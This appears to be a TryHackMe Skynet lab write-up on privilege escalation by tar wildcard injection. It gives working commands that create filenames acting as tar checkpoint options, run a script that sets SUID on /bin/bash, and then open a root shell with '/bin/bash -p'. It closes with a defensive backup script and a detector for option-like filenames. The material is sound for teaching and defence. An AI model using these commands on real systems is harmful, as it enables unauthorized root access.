Wildcard Injection Using tar

An attacker can use crafted filenames to inject arguments into commands that are run by other users, such as root.

Wildcard Injection Example

We created two files named file1 and --help, with the contents "this_is_file1" and "this_is_file2" respectively. But when we run cat --help we get the help menu of the cat command rather than the file's content. Yeah, this is weird, and this is exactly what we are going to do, but with tar.

Tar is a software utility that is used to create and extract archive files.

For demonstration purposes, we are taking a room from TryHackMe named Skynet.

We already have a netcat shell and we are www-data, which is a non-root user. Let's look at the cron jobs.

Use the below command to see all cronjobs.

Command: cat /etc/crontab

As we can see, there is an interesting job: /home/milesdyson/backups/backup.sh runs every minute with root privileges.

Moving into /home/milesdyson/backups, we can see that backup.sh contains a short script. This script changes directory to /var/www/html and creates an archive of all the files using tar, saving it as /home/milesdyson/backups/backup.tgz.

The wildcard is used to archive multiple files at once. We can use it to inject arguments of our choosing, which tar will process just like the cat --help example we saw above.

Exploit Wildcard

Move to /var/www/html and create some files (these files are actually tar arguments) using the commands below:

printf '#!/bin/bash\nchmod +s /bin/bash\n' > shell.sh
    or
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

In the backend, once the shell expands the wildcard, the whole thing is interpreted as:

tar cf /home/milesdyson/backups/backup.tgz --checkpoint=1 --checkpoint-action=exec=sh shell.sh

shell.sh contains a bash script with a command that sets the SUID bit on /bin/bash. The second file makes tar execute shell.sh. So when the cron job runs the next minute, tar will take those files as arguments/flags rather than normal file names, and /bin/bash ends up with setuid permission.

We can see that /bin/bash now has the SUID bit set, which means we can execute it with root privileges and get a root shell.

Now run the below command to get the root shell.

Command: /bin/bash -p
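The same job written so that a bare wildcard can never hand filenames to tar as options, plus a check that reports option-like filenames in a directory a root cron job reads. This is an added example, not the room's backup.sh or code from the original write-up; the paths in the comments are placeholders.

```bash
#!/bin/bash
# Added example, not the room's backup.sh: a backup job that never lets '*'
# expand into tar options, plus a check for filenames that look like options.
# Paths used in the comments are placeholders for the demonstration.

# Print every entry in directory $1 whose name begins with '-' and return 1 if
# any exist. A cron job that runs 'tar ... *' in $1 would pass such names to
# tar as flags, so their presence in a web root is worth alerting on.
find_option_like_names() {
    local dir="$1" name found=0
    for path in "$dir"/*; do
        [ -e "$path" ] || continue          # empty dir leaves a literal '*'
        name=$(basename "$path")
        case "$name" in
            -*) printf 'option-like filename: %s\n' "$path"; found=1 ;;
        esac
    done
    return "$found"
}

# Archive the contents of $1 into $2 without a wildcard: '-C' selects the
# directory and '.' is the only member argument, so a planted
# '--checkpoint-action=exec=...' file is stored as data, never parsed as a
# flag. '--' additionally ends option parsing for anything that follows it.
safe_backup() {
    local src="$1" out="$2"
    tar -cf "$out" -C "$src" -- .
}

# Example cron body (placeholder paths): report suspicious names to syslog,
# then archive regardless, since the archive itself is now safe.
# find_option_like_names /var/www/html || logger -t backup 'option-like names in web root'
# safe_backup /var/www/html /home/backups/backup.tgz
```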
